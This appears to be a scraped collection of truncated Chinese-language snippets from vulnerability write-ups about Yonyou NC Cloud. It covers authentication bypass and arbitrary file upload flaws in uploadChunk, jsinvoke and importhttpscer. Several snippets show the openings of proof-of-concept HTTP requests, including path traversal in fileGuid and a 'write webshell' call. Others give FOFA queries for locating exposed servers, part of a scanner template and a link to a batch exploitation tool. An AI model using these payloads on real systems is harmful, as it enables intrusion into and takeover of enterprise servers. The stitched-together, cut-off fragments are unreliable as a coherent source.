用友NC Cloud ncchr登陆校验中存在安全特性绕过漏洞,由于登陆调用Loginfilter.class类针对request请求头中accesstokenNCC解密校验场景缺失,因此存在模拟访问时,特定accesstokenNCC序列串校验永不失效。 根据安全通报中的漏洞描述,对于ncchr的路由鉴权存在漏洞。 路由分析 通过安装包安装完成站点,然后将服务端的代码打包使用ide...
一:漏洞描述 NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件上传漏洞。 二:漏洞影响版本 未知 三:网络空间测绘查询 fofa:app="用友-NC-Cloud" 四:漏洞复现 POC: POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../.....
用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。 漏洞影响 未知 复现环境 app="用友-NC-Cloud" 漏洞复现 POC如下: 1POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.12Host:3User-Agent: Mozilla/4.0 ...
漏洞描述用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 app="用友-NC-Cloud" 写入webshell POST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName": "nc.itf.iufo.IBaseSPService", "methodName": "saveXStreamCo...
用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。 漏洞复现 fofa语法:app="用友-NC-Cloud" 登录页面如下: POC: POST/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1HTTP/1.1Host:Content-Type: multipart/form-data; ...
21 changes: 21 additions & 0 deletions 21 用友NC Cloud jsinvoke 任意文件上传漏洞.md Original file line numberDiff line numberDiff line change @@ -3,6 +3,7 @@ 用友NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 app="用友-NC-Cloud" ## ...
9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 可以收录到专辑噢~ 五:批量检测 项目地址: https://github.com/MzzdToT/Yongyou_NC_Cloud_upload_rce 六:修复建议 联系厂家发布更新补丁 # 渗透测试# 黑客# 网络安全# 网络安全技术 ...
漏洞描述: 用友NC Cloud importhttpscer接口存在任意文件上传漏洞,未经身份验证的攻击者可以利用此漏洞上传后门文件获取服务器权限漏洞详情: 游客用户没有权限查看,请登录修复建议: 对上传文件的大小和类型进行校验,定义上传文件类型白名单。POC下载 登录后下载 环境验证 该poc暂无验证环境 ...
name: 用友NC Cloud uploadChunk任意文件上传漏洞 author: afan severity: critical tags: yonyou,changjietong,bjxsec,yonyouoa description: fofa app="畅捷通-TPlus" variables: file_name: "{{to_lower(rand_text_alpha(8))}}.txt" file_content: "{{to_lower(rand_text_alpha(26))}}" requests: - ...
漏洞描述用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 app="用友-NC-Cloud" 写入webshell POST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName": "nc.itf.iufo.IBaseSPService", "methodName": "saveXStreamConfig"...